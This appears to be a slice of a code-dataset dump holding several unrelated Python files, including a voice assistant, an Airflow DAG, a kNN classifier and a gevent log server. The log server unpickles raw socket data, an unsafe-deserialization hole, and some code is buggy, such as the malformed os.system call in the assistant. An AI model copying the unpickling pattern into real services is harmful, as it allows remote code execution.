i.replace(\"Aries\", \"\")\n i = i.replace(\"close\", \"\")\n i = i.replace(\" \", \"\")\n\n engine.say(\"closing \" + i)\n if i == \"chrome\":\n os.system('taskkill /im chrome.exe')\n engine.runAndWait()\n taskkill = \"'taskkill /im %s.exe'\" % i\n os.system('%s') % taskkill\n\ndef closeNotes():\n f = open(\"C://Users/benvc/Desktop/AriesNotes.txt\", \"w\")\n f.write(\"\")\n f.close()\n # Speech\n engine.say(\"Notes Cleared\")\n engine.runAndWait()\n\ndef AriesType(i):\n # Remove the question and replace spaces\n i = i[12:]\n i = i.replace(\" \", \"{SPACE}\")\n # Send keystrokes through\n SendKeys.SendKeys(str(i))\n\ndef weather():\n #site URL\n url = 'https://weather.gc.ca/city/pages/ns-19_metric_e.html'\n #Open page as HTML\n page = urllib2.urlopen(url)\n soup = BeautifulSoup(page.read())\n #Strip everything but the words\n condition = soup.find(\"dl\", {\"class\": \"col-sm-6 dl-horizontal wxo-dl mrgn-bttm-0\"}).contents\n condition = str(condition)\n condition = condition.replace(\"n'\", \" \")\n condition = condition.replace(\"u'\", \" \")\n condition = condition.replace(\" \\ \", \" \")\n condition = condition.replace(\"
Condition: \", \" \")\n condition = condition.replace(\" \",\"\")\n condition = condition.replace('class=\"mrgn-bttm-0',\"\")\n condition = condition.replace('[ , Condition: , , ', \" \")\n condition = condition.replace(' Pressure: , , 101.2 kPa', \"\")\n condition = condition.replace(' , , 29.9 inches , , Tendency: , , falling , , Visibility: , , 24 km', \"\")\n condition = condition.replace(' , , 15 miles , ]', \" \")\n condition = condition.replace(\" \", \"\")\n condition = condition.replace(\" \",\"\")\n condition = condition.replace(' Pressure: ',\"\")\n condition = condition.replace(\",\",\"\")\n condition = condition.replace(' 101.0 kPa',\"\")\n condition = condition.replace(' 29.8 inches Tendency: falling Visibility: 24 km',\"\")\n condition = condition.replace('class',\"\")\n condition = condition[:20]\n condition = condition.replace('
',\"\")\n for x in range(10):\n condition = condition.replace(' ',\" \")\n temp = soup.find(\"span\", {\"class\": \"wxo-metric-hide\"}).contents\n tempString = str(temp)\n tempString = tempString.replace(\"[u'\", \"\")\n #tempString = tempString.replace(\"-\", \"\")\n tempString = tempString.replace(\"°', C, u'\", \" \")\n tempString = tempString.replace('\"', \"\" )\n tempString = tempString.replace(\"n']\", \" \" )\n tempString = tempString.replace(\" \\ \", \"\")\n #Print statement\n Weather = (\"The weather is \" + condition + \"and \" + tempString)\n engine.say(Weather)\n engine.runAndWait()\n print(Weather)\n\ndef restart():\n os.execl(sys.executable, sys.executable, *sys.argv)\n\n# Start the run procedure\n# Loop until I quit the program\nfor x in range(100000000):\n while request != \"aries shut down\":\n if request == \"aries shut down\":\n os.quit()\n # Reset request at beginning of loop\n request = \"\"\n # Try to pick up microphone audio, if it doesn't it fails\n try:\n # recognize speech using Google Speech Recognition\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"..\")\n audio = r.listen(source)\n # recognize speech using Google Speech Recognition\n request = r.recognize_google(audio)\n\n # Fetch the problem problem to give the proper output\n\n print(\"CMD: \" + request)\n # Make the request in lower\n request = request.lower()\n if \"aries\" in str(request):\n for y in range(250):\n request = \"\"\n # Try to pick up microphone audio, if it doesn't it fails\n try:\n # recognize speech using Google Speech Recognition\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"..\")\n audio = r.listen(source)\n # recognize speech using Google Speech Recognition\n request = r.recognize_google(audio)\n\n # Fetch the problem problem to give the proper output\n\n\n # Make the request in lower\n request = request.lower()\n\n # If to see if Aries is said\n # Commands in If statements\n # if \"make a note\" in str(request) or \"make note\" in str(request) or \"write a note\" in str(request) or \"take note\" in str(request):\n # writeNote(request)\n #\n # # Weather right now\n # elif \"weather right now\" in str(request) or \"what's the weather like\" in str(request) or \"how is the weather\" in str(request):\n # weather()\n #\n #\n # # Idle Aries for a time amount\n # elif \"idle for\" in str(request):\n # AriesIdle(request)\n #\n # # Clear the notepad file\n # elif \"clear my notes\" in str(request) or \"clear notes\" in str(request) or \"clear my nose\" in str(request):\n # closeNotes()\n #\n # # Make Aries Tab\n # elif \"aries tab\" in str(request):\n # #Tab using Sendkeys\n # SendKeys.SendKeys(\"%{TAB}\")\n #\n # # Chrome switch tab\n # elif \"switch tab\" in str(request):\n # #Tab using Sendkeys\n # SendKeys.SendKeys(\"^{TAB}\")\n #\n # # Google search\n # elif \"search this\" in str(request) or \"Aries google\" in str(request) or \"Aries look up\" in str(request):\n # Googling(request)\n #\n # # Get Aries to type things out\n # elif \"type\" in str(request):\n # AriesType(request)\n #\n # # Second command for Aries typing\n # elif \"say\" in str(request):\n # AriesType(request)\n #\n # # Open anything\n # elif \"aries open\" in str(request):\n # openexes(request)\n #\n # elif \"aries close\" in str(request):\n # print(\"close\")\n # closeExe(request)\n #\n # elif \"open alarm\" in str(request) or \"open alarm\" in str(request):\n # os.system('AIalarm.py')\n # os.quit()\n #\n # elif \"restart 202\" in str(request):\n # restart()\n #\n # # print process 
time\n # elif \"current process time\" in str(request):\n # runtime = time.clock()\n # engine.say(str(runtime.format(2)) + \" seconds of run time.\")\n # engine.runAndWait()\n #\n # else:\n # print(\"Nothing Triggered\")\n\n except:\n print(str(time.clock()) + \" seconds of run time.\")\n except:\n print(\"\")","sub_path":"ARCHIVED/__ARIESMAIN__.py","file_name":"__ARIESMAIN__.py","file_ext":"py","file_size_in_byte":14807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"480037926","text":"'''Examples of organizer-provided metrics.\nYou can just replace this code by your own.\nMake sure to indicate the name of the function that you chose as metric function\nin the file metric.txt. E.g. mse_metric, because this file may contain more \nthan one function, hence you must specify the name of the function that is your metric.'''\n\nimport numpy as np\nimport scipy as sp\n\ndef accuracy(solution, prediction):\n error = 0\n for sol, pred in zip(solution, prediction):\n if sol != pred:\n error += 1\n return 1 - (error / len(solution))\n\n","sub_path":"starting_kit/scoring_program/my_metric.py","file_name":"my_metric.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"630204570","text":"from random import randint\n\n# define defaults for max dices and dice sides:\nmax_dices = 6\nmax_sides = 100\n\n\ndef gameRestart(dice_num, dice_sides): # this function handles restart\n print('Want to roll same dices again? Type \"r\"')\n print('Want to select new dices? Type \"n\"')\n print('Want to stop playing? Type \"s\"')\n restart = input('>')\n if restart.lower() == 'r':\n rollDice(dice_num, dice_sides)\n elif restart.lower() == 'n':\n gameInit()\n elif restart.lower() == 's':\n print(\"Thank you for using this program! See you next time!\")\n quit()\n else:\n print(\"Sorry, I did not understand you, try again:\")\n gameRestart(dice_num, dice_sides)\n\n\ndef rollDice(dice_num, dice_sides): # this function handles rolling the dices\n total_sum = 0\n print(\"\\n\\n\\nYou rolled %s %s-sided dices:\" % (dice_num, dice_sides))\n for i in range(0, dice_num):\n roll_result = randint(1, dice_sides)\n print(\"Dice #%s rolled %s\" % (i + 1, roll_result))\n total_sum += roll_result\n if dice_num > 1:\n print(\"\\nTotal dice sum: %s\" % total_sum)\n gameRestart(dice_num, dice_sides)\n\n\ndef gameInit(): # startup function that gathers basic values of number of dices and number of their sides\n while True:\n dice_num = input(\"Please enter how many dices you need to roll from 1 to %s:\\n> \" % max_dices)\n dice_sides = input(\"How many sides per dice? 
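# A reusable validated-integer prompt in the same spirit as gameInit here,
# with illustrative bounds; it keeps asking until the reply is an int in range.
def ask_int(prompt, low, high):
    while True:
        try:
            value = int(input(prompt))
        except ValueError:
            print("Please only use integers!")
            continue
        if low <= value <= high:
            return value
        print("Please enter a value between %s and %s" % (low, high))

# e.g. dice_num = ask_int("How many dices? ", 1, 6)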
You can select between 2 and %s:\\n> \" % max_sides)\n try:\n if int(dice_num) not in range(1, max_dices + 1) or int(dice_sides) not in range(2, max_sides + 1):\n print(\"\\nPlease input valid values for number of dices and their sides\\n\")\n else:\n rollDice(int(dice_num), int(dice_sides))\n break\n except ValueError:\n print(\"\\nPlease only use integers!\\n\")\n\n# Here we start a game:\ngameInit()\n","sub_path":"python_projects/DiceRoll.py","file_name":"DiceRoll.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6161199","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 15 17:05:20 2021\n\n@author: viswa\n\"\"\"\n\nfrom airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.mysql_operator import MySqlOperator\nfrom airflow.operators.email_operator import EmailOperator\nfrom datetime import datetime,timedelta\nfrom pre_process import process_data\nfrom pre_processing import pre_process\n\n\n\ndefault_args = {\"owner\": \"airflow\", \"start_date\": datetime(2021, 6, 15)}\n\nwith DAG(dag_id=\"analytics\",default_args=default_args,schedule_interval='@daily',catchup=True) as dag:\n \n check_file = BashOperator(\n task_id=\"check_file\",\n bash_command=\"shasum ~/ip_files/or.csv\",\n retries=2,\n retry_delay=timedelta(seconds=15)\n )\n \n pre_process = PythonOperator(\n task_id = \"pre\",\n python_callable = pre_process\n )\n \n groupbys = PythonOperator(\n task_id=\"aggre\",\n python_callable=process_data\n )\n \n create_table = MySqlOperator(\n task_id='create_table', \n mysql_conn_id=\"mysql_db1\", \n sql=\"CREATE table IF NOT EXISTS aggre_res (stock_code varchar(100) NULL,descb varchar(100) NULL,country varchar(100) NULL,total_price varchar(100) NULL)\"\n )\n\n \n insert = MySqlOperator(\n task_id='insert_db', \n mysql_conn_id=\"mysql_db1\", \n sql=\"LOAD DATA INFILE '/var/lib/mysql-files/fin.csv' INTO TABLE aggre_res FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n' IGNORE 1 ROWS;\")\n \n email = EmailOperator(task_id='send_email',\n to='viswatejaster@gmail.com',\n subject='Daily report generated',\n html_content=\"\"\"
Congratulations! Your store reports are ready.
\"\"\",\n )\n\n check_file >> pre_process >> groupbys >> create_table >> insert >> email","sub_path":"Airflow 2.0/docker-airflow/dags/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612728593","text":"from parser_utils import get_args\nfrom preprocess_docs import CorpusPreProcessor, GRAPH_PREPROCESS_ARGS\nfrom dataloader import DocumentGraphDataset\nfrom learner import Learner\n\nif __name__ == \"__main__\":\n\n args, device = get_args()\n\n ######################################\n # Initiate learner\n ######################################\n learner = Learner(\n experiment_name=args.experiment_name, device=device, multi_label=False\n )\n # Store how the args for constructing graphs from text in the learner\n # such that these can be stored with the saved model\n graph_preprocessing_args = {\n 'use_master_node':args.use_master_node,\n 'use_directed_edges':args.use_directed_edges,\n 'normalize_edges':args.normalize_edges,\n 'window_size':args.window_size,\n }\n learner.set_graph_preprocessing_args(\n graph_preprocessing_args\n )\n\n word2idx = None\n # Load pretrained model\n if args.pretrained_model is not None:\n\n assert (\n args.path_to_word2idx is not None\n ), \"The word2idx path must be given when a pretrained model is loaded\"\n learner.load_model(args.pretrained_model, lr=args.lr)\n # Overwrite from the pre-trained model\n graph_preprocessing_args = learner.get_graph_preprocessing_args()\n\n # Check if the graph preprocessing arguments are consistent with those expected\n assert set(list(graph_preprocessing_args.keys())) == set(\n GRAPH_PREPROCESS_ARGS), \"Error, invalid arguments for the graph preprocessing args, got keys: {}, \\n expected: {}\".format(\n list(graph_preprocessing_args.keys()), GRAPH_PREPROCESS_ARGS)\n\n ######################################\n # Initiate corpus prepper\n ######################################\n corpus_prepper = CorpusPreProcessor(\n min_freq_word=args.min_freq_word,\n multi_label=False,\n word2idx_path=args.path_to_word2idx,\n )\n\n if args.do_train:\n\n ######################################\n # Load dataset\n ######################################\n print(\"Loading dataset...\")\n # Read data\n docs, labels, n_labels, word2idx = corpus_prepper.load_clean_corpus(\n args.path_to_dataset\n )\n # Split into train/val\n train_docs, dev_docs, train_labels, dev_labels = corpus_prepper.split_corpus(\n docs, labels, args.percentage_dev\n )\n\n # Instantiate dataloader\n dataset_train = DocumentGraphDataset(\n docs=train_docs,\n labels=train_labels,\n word2idx=word2idx,\n **graph_preprocessing_args\n )\n\n dataloader_train = dataset_train.to_dataloader(\n batch_size=args.batch_size, shuffle=True, drop_last=True\n )\n\n dataset_dev = DocumentGraphDataset(\n docs=dev_docs,\n labels=dev_labels,\n word2idx=word2idx,\n **graph_preprocessing_args\n )\n\n dataloader_dev = dataset_dev.to_dataloader(\n batch_size=args.batch_size, shuffle=False, drop_last=False\n )\n\n print(\"Done loading dataset!\")\n\n ######################################\n # Initiate model\n ######################################\n\n if args.pretrained_model is None:\n # Load embeddings\n embeddings = corpus_prepper.load_embeddings(\n f_path=args.path_to_embeddings,\n vocab=word2idx,\n embedding_type=\"word2vec\",\n )\n # Initialize a new model\n learner.init_model(\n args.model_type,\n lr=args.lr,\n n_feat=embeddings.shape[1],\n 
n_message_passing=args.message_passing_layers,\n n_hid=args.hidden,\n n_penultimate=args.penultimate,\n n_class=n_labels,\n dropout=args.dropout,\n embeddings=embeddings,\n use_master_node=args.use_master_node,\n )\n else:\n # Load pretrained\n learner.load_model(path=args.pretrained_model, lr=args.lr)\n\n ######################################\n # Start training\n ######################################\n\n eval_every = (\n len(dataloader_train)\n if args.eval_every == \"epoch\"\n else int(args.eval_every)\n )\n\n print(\"Start training...\")\n for epoch in range(args.epochs):\n\n learner.train_epoch(dataloader_train, eval_every=eval_every)\n\n learner.evaluate(dataloader_dev)\n\n ######################################\n # Infer Test Set\n ######################################\n if args.do_evaluate:\n\n if args.do_train:\n print(\"Loading best model to infer test set...\")\n learner.load_best_model()\n else: # Load other pretrained model\n assert (\n args.pretrained_model is not None\n ), \"--pretrained-model must be given when --do-train is False and --do-evaluate is True\"\n # print(\"Loading pretrained model for evaluation...\")\n learner.load_model(args.pretrained_model)\n\n ######################################\n # Load dataset\n ######################################\n print(\"Start evaluating on test set...\")\n # Read data\n test_docs, test_labels, n_labels, word2idx = corpus_prepper.load_clean_corpus(\n args.path_to_test_set\n )\n\n dataset_test = DocumentGraphDataset(\n docs=test_docs,\n labels=test_labels,\n word2idx=word2idx,\n **graph_preprocessing_args\n )\n\n dataloader_test = dataset_test.to_dataloader(\n batch_size=args.batch_size, shuffle=False, drop_last=False\n )\n\n learner.evaluate(\n dataloader_test,\n save_model=False\n )\n","sub_path":"mpad/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235508839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated by MengQiu Wang on 2019-05-04\n\"\"\"\n\n\n# 516. 
Longest Palindromic Subsequence\n# Given a string s, find the longest palindromic subsequence's length in s.\n# You may assume that the maximum length of s is 1000.\n#\n# Example 1:\n# Input:\n#\n# \"bbbab\"\n#\n# Output:\n#\n# 4\n#\n# One possible longest palindromic subsequence is \"bbbb\".\n#\n# Example 2:\n# Input:\n#\n# \"cbbd\"\n#\n# Output:\n#\n# 2\n# idea - dp[i][j]: the longest palindromic subsequence's length of substring(i, j),\n# here i, j represent left, right indexes in the string\n# State transition:\n# dp[i][j] = dp[i+1][j-1] + 2 if s.charAt(i) == s.charAt(j)\n# otherwise, dp[i][j] = Math.max(dp[i+1][j], dp[i][j-1])\n# Initialization: dp[i][i] = 1\n# idea - this effectively checks every interval of the string\ndef longestPalindromeSubseq(s: str) -> int:\n dp = [[0 for _ in range(len(s))] for _ in range(len(s))]\n for i in range(len(s) - 1, -1, -1): # iterate the start index backwards\n dp[i][i] = 1\n for j in range(i + 1, len(s)): # when start and end coincide the body never runs, which skips that case; traverse the intervals that begin at i\n if s[i] == s[j]:\n\n dp[i][j] = dp[i + 1][j - 1] + 2 # extend from the lower-left diagonal: for i=0, j=2 the diagonal cell is (1,1)\n else: # i and j can wrap the diagonal interval into a new palindrome, so the diagonal value gains 2, i.e. indexes 0,1,2 form a new palindrome\n\n dp[i][j] = max(dp[i + 1][j], dp[i][j - 1]) # take the maximum over the sub-intervals of (i, j): from the left and from below\n return dp[0][len(s) - 1] # return the longest palindrome length for the interval 0 to len(s)-1\n\n\nif __name__ == \"__main__\":\n longestPalindromeSubseq('cbbd')\n","sub_path":"Basic_Algorithm/DynamicProgramming/longestpalindromicsubsequence.py","file_name":"longestpalindromicsubsequence.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"421880157","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\nimport struct, pickle, gevent\nfrom threading import Thread\nfrom gevent import socket, monkey\n\nmonkey.patch_all()\n\n\nclass JournalServer(object):\n conns = {}\n\n def __init__(self, ip, port, logger, *, listen=500):\n self.ip = ip\n self.port = port\n self.logger = logger\n self.listen = listen\n self.socket = None\n self.isrun = False\n\n def start(self):\n try:\n if not self.socket:\n self.socket = socket.socket()\n self.socket.bind((self.ip, self.port))\n self.socket.listen(self.listen)\n print(\"JournalServer started successfully\")\n if not self.isrun:\n self.isrun = True\n while self.isrun:\n conn, addr = self.socket.accept()\n print(\"New connection:\", addr)\n JournalServer.conns[conn.fileno()] = conn\n gevent.spawn(self.handle_request, conn, addr)\n\n except KeyboardInterrupt as e:\n self.isrun = False\n print(e)\n\n def stop(self):\n if self.socket:\n self.socket.close()\n self.logger.stop()\n self.isrun = False\n\n def handle_request(self, conn, addr):\n try:\n while self.isrun:\n data_byte = conn.recv(4)\n data_len = struct.unpack(\">L\", data_byte)[0]\n data_byte = conn.recv(data_len)\n data = pickle.loads(data_byte)\n # logger.write(appName, data_byte)\n self.logger.write(addr[0], data)\n\n if not data:\n # print(\"client has been closed...\")\n conn.shutdown(socket.SHUT_RD)\n conn.close()\n JournalServer.conns.pop(conn.fileno())\n else:\n pass\n # print(\"recv:\", data)\n # conn.send(data)\n\n except Exception as ex:\n print(ex)\n print(\"Connection closed\", addr)\n finally:\n conn.close()\n if conn.fileno() in JournalServer.conns.keys():\n JournalServer.conns.pop(conn.fileno())\n\n\nclass JournalServerThread(Thread):\n def __init__(self, ip, port, logger, *, listen=500):\n self.journalServer = JournalServer(ip, port, logger, listen=listen)\n Thread.__init__(self)\n\n def run(self):\n 
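# A quick usage sketch for longestPalindromeSubseq above, assuming the
# function is defined in the same scope; the expected values follow from
# the examples in the comments.
assert longestPalindromeSubseq("bbbab") == 4  # "bbbb"
assert longestPalindromeSubseq("cbbd") == 2   # "bb"
assert longestPalindromeSubseq("a") == 1
print("all longestPalindromeSubseq checks passed")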
self.journalServer.start()\n","sub_path":"journal/JournalServer.py","file_name":"JournalServer.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"262948615","text":"import cv2\nimport numpy as np\n\n\n# initialize webcam\ncap = cv2.VideoCapture(0)\n\n# define range of HSV values (green, in this case: hue 45-75 in OpenCV)\nlower_hsv = np.array([45, 0, 0])\nupper_hsv = np.array([75, 255, 255])\n\nwhile True:\n _, frame = cap.read()\n\n hsv_img = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv_img, lower_hsv, upper_hsv)\n\n res = cv2.bitwise_and(frame, frame, mask=mask)\n\n cv2.imshow('Original', frame)\n cv2.imshow('Mask', mask)\n cv2.imshow('Filtered Color', res)\n\n if cv2.waitKey(1) == 13: # if Enter key is pressed\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"object_tracking/filtering_by_color.py","file_name":"filtering_by_color.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"410136106","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom uncertainties import ufloat\r\n\r\nimport matplotlib as mpl\r\nmpl.use('pgf')\r\nimport matplotlib.pyplot as plt\r\nmpl.rcParams.update({\r\n'font.family': 'serif',\r\n'text.usetex': True,\r\n'pgf.rcfonts': False,\r\n'pgf.texsystem': 'lualatex',\r\n'pgf.preamble': r'\\usepackage{unicode-math}\\usepackage{siunitx}',\r\n})\r\n\r\nt = np.genfromtxt(\"data/A_times.csv\",delimiter=\",\",unpack=True,usecols=0) # stored in units of 10^-3 s\r\nU_C = np.genfromtxt(\"data/A_lnU_C.csv\",delimiter=\",\",unpack=True,usecols=0)\r\n\r\nlnUNull=np.log(4.8) #ln(4.8)\r\n\r\nplt.plot(t,U_C,'g*',label=\"Messwerte\")\r\nplt.yscale('log') # logarithmic y-axis\r\nplt.grid()\r\nplt.legend()\r\nplt.xlabel(r'$t / 10^{-3} \\, \\mathrm{s}$')\r\nplt.ylabel(r'$U_C \\,/\\, \\mathrm{V}$')\r\nplt.savefig(\"plots/plot_messw.pdf\")\r\n\r\nplt.clf()\r\n\r\nparams, covariance_matrix = np.polyfit(t*10**(-3), np.log(U_C), deg=1, cov=True) # fit with a linear function\r\n\r\nerrors = np.sqrt(np.diag(covariance_matrix)) # errors = square root of the covariance matrix diagonal\r\n\r\nfor name, value, error in zip('ab', params, errors):\r\n print(f'{name} = {value:.3f} ± {error:.3f}') # output: a and b with y=a*x + b\r\n\r\nplt.plot(t,U_C,'r*',label=\"Messwerte\")\r\nx_plot = np.linspace(-2.5, -0.25)\r\nplt.plot(x_plot,np.exp(params[0]*x_plot*10**(-3)+params[1]),label=\"Lineare Regression\")\r\nplt.legend(loc=\"best\")\r\nplt.grid()\r\nplt.yscale('log') # logarithmic y-axis\r\nplt.xlabel(r'$t / 10^{-3} \\mathrm{s}$')\r\nplt.ylabel(r'$U_C \\,/\\, \\mathrm{V}$')\r\nplt.savefig(\"plots/ausgleichsgerade.pdf\")\r\n\r\n# Output: \r\n# a = -1221.631 ± 18.673\r\n# b = -1.561 ± 0.029\r\n\r\n# compute the constant B (cf. auswertung.text/main.pdf) with uncertainties\r\n# B=RC(b - ln U_0)=-1/a (b - ln U_0)\r\na=ufloat(params[0],errors[0]) \r\nb=ufloat(params[1],errors[1])\r\nB=(-1/a)*(b-lnUNull)\r\nprint('B ist ',B.n,'plusminus',B.s)\r\n\r\n#Output: B ist -0.0025620930329117494 plusminus 4.59548003834578e-05","sub_path":"V353_RC_Kreis/python/plot_A_ausgleichsgerade.py","file_name":"plot_A_ausgleichsgerade.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"255649168","text":"# Implement a kNN classifier from scratch\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom matrics import get_accuracy\r\n\r\n\r\nclass KNNClassifier:\r\n\r\n # initialize the KNN classifier\r\n def __init__(self, k):\r\n assert k >= 1, \"k must be a valid value\"\r\n self.k = k\r\n # names starting with _ are private and not meant to be accessed from outside\r\n self._X_train = None\r\n self._y_train = None\r\n\r\n def fit(self, X_train, y_train):\r\n \"\"\"\r\n Train the classifier on the training set\r\n :param X_train: training set features supplied by the caller\r\n :param y_train: training set targets supplied by the caller\r\n :return: self\r\n \"\"\"\r\n assert X_train.shape[0] == y_train.shape[0], \\\r\n \"the training set X and y must have the same size\"\r\n assert self.k <= X_train.shape[0], \\\r\n \"the training set X must contain at least k samples\"\r\n\r\n self._X_train = X_train\r\n self._y_train = y_train\r\n return self\r\n\r\n def predict(self, X_predict):\r\n \"\"\"\r\n Prediction function\r\n :param X_predict: data set to predict\r\n :return: array with the prediction for each vector\r\n \"\"\"\r\n assert self._X_train is not None and self._y_train is not None, \\\r\n \"fit must be called before predict\"\r\n assert X_predict.shape[1] == self._X_train.shape[1], \\\r\n \"the number of features of the prediction data must match the training set X\"\r\n\r\n y_predict = [self._predict(x) for x in X_predict]\r\n return np.array(y_predict)\r\n\r\n def _predict(self, x):\r\n \"\"\"\r\n Predict a single vector\r\n :param x: the single vector to predict\r\n :return:\r\n \"\"\"\r\n assert x.shape[0] == self._X_train.shape[1], \\\r\n \"the number of features of the prediction data must match the training set X\"\r\n distances = [((np.sum((x_train - x) ** 2)) ** 0.5) for x_train in self._X_train]\r\n nearest = np.argsort(distances)\r\n\r\n top_K = [self._y_train[i] for i in nearest[:self.k]]\r\n votes = Counter(top_K)\r\n\r\n return votes.most_common(1)[0][0]\r\n\r\n def score(self, X_test, y_test):\r\n y_predict = self.predict(X_test)\r\n return get_accuracy(y_test, y_predict)\r\n\r\n\r\ndef loadData():\r\n raw_data_X = [[3.3935, 2.3312],\r\n [3.1101, 1.7815],\r\n [1.3438, 3.3684],\r\n [3.5823, 4.6792],\r\n [2.2804, 2.8670],\r\n [7.4234, 4.6965],\r\n [5.7451, 3.5340],\r\n [9.1722, 2.5111],\r\n [7.7928, 3.4241],\r\n [7.9398, 0.7916]]\r\n raw_data_y = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]\r\n X_train = np.array(raw_data_X)\r\n y_train = np.array(raw_data_y)\r\n return X_train, y_train\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # load the data set\r\n X_train, y_train = loadData()\r\n\r\n # data point to predict\r\n x = [8.0936, 3.3657]\r\n # convert the point into an array\r\n X_predict = np.array([x])\r\n\r\n knn_clf = KNNClassifier(k=6)\r\n knn_clf.fit(X_train, y_train)\r\n y_predict = knn_clf.predict(X_predict)\r\n print(y_predict[0])\r\n","sub_path":"机器学习/代码/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"234858076","text":"from tkinter import *\r\nfrom datetime import *\r\nfrom tkinter import font\r\nfrom tkinter.font import families\r\nOrderType = str(\"\")\r\nPizzaOrder = [[]for main in range(2)]\r\n\r\ndef RetInfo():\r\n File = open(\"E:/PRG/12PRG/Python Coding/EOY/Menu.txt\" ,\"r\")\r\n FileList1 = ((File.read()).split(\"\\n\")) \r\n FileList2 = []\r\n for main in range(len(FileList1)):\r\n 
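# A sketch cross-checking the handwritten KNNClassifier above against
# scikit-learn's KNeighborsClassifier on the same toy data; loadData is the
# helper defined in that file, and scikit-learn is assumed to be installed.
import numpy as np
from sklearn.neighbors import KNeighborsClassifier

X_train, y_train = loadData()
X_new = np.array([[8.0936, 3.3657]])

sk_clf = KNeighborsClassifier(n_neighbors=6)
sk_clf.fit(X_train, y_train)
print(sk_clf.predict(X_new))  # expected [1], matching the custom classifier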
FileList2.append((FileList1[main]).split(\"/\")) \r\n return(FileList2)\r\n\r\ndef CustPage(PizzaData):\r\n global OrderType\r\n\r\n Win1 = Tk()\r\n Win1.geometry(\"360x360\")\r\n Win1.config(bg=\"#fff2cc\")\r\n\r\n PickBut = Button(Win1,text=(\"Pick Up\"),fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(PickFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox)))\r\n DeliBut = Button(Win1,text=(\"Delivery\"),fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(DeliFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox)))\r\n NameBox = Entry(Win1,text=\"\",fg=(\"#000000\"),bg=(\"#cfe2f3\"),font =(\"{Trebuchet MS} 10 italic\"),state=\"disabled\")\r\n AddrBox = Entry(Win1,text=\"\",fg=(\"#000000\"),bg=(\"#cfe2f3\"),font =(\"{Trebuchet MS} 10 italic\"),state=\"disabled\")\r\n PhonBox = Entry(Win1,text=\"\",fg=(\"#000000\"),bg=(\"#cfe2f3\"),font =(\"{Trebuchet MS} 10 italic\"),state=\"disabled\")\r\n ContBut = Button(Win1,text=\"Continue\",fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(ContFun(PizzaData,NameBox.get(),AddrBox.get(),PhonBox.get(),OrderType)))\r\n ExitBut = Button(Win1,text=\"Exit\",fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(ExitFun(Win1)))\r\n CleaBut = Button(Win1,text=\"Clear\",fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(CleaFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox)))\r\n\r\n PickBut.pack()\r\n DeliBut.pack()\r\n NameBox.pack()\r\n AddrBox.pack()\r\n PhonBox.pack()\r\n\r\n ContBut.pack()\r\n ExitBut.pack()\r\n CleaBut.pack()\r\n\r\n Win1.mainloop()\r\n return\r\n\r\ndef PickFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox):\r\n global OrderType\r\n OrderType = (\"Pick Up\")\r\n PickBut.config(state=\"disabled\")\r\n DeliBut.config(state=\"normal\")\r\n NameBox.config(state=\"normal\")\r\n AddrBox.config(state=\"disabled\")\r\n PhonBox.config(state=\"disabled\")\r\n AddrBox.delete(0,\"end\")\r\n PhonBox.delete(0,\"end\")\r\n return\r\n\r\ndef DeliFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox):\r\n global OrderType\r\n OrderType = (\"Delivery\")\r\n PickBut.config(state=\"normal\")\r\n DeliBut.config(state=\"disabled\")\r\n NameBox.config(state=\"normal\")\r\n AddrBox.config(state=\"normal\")\r\n PhonBox.config(state=\"normal\") \r\n return\r\n\r\ndef ContFun(PizzaData,Name,Address,Phone,OrderType):\r\n if ((OrderType) == (\"Pick Up\")):\r\n if Name == \"\":\r\n print(\"Error in Name\")\r\n else:\r\n 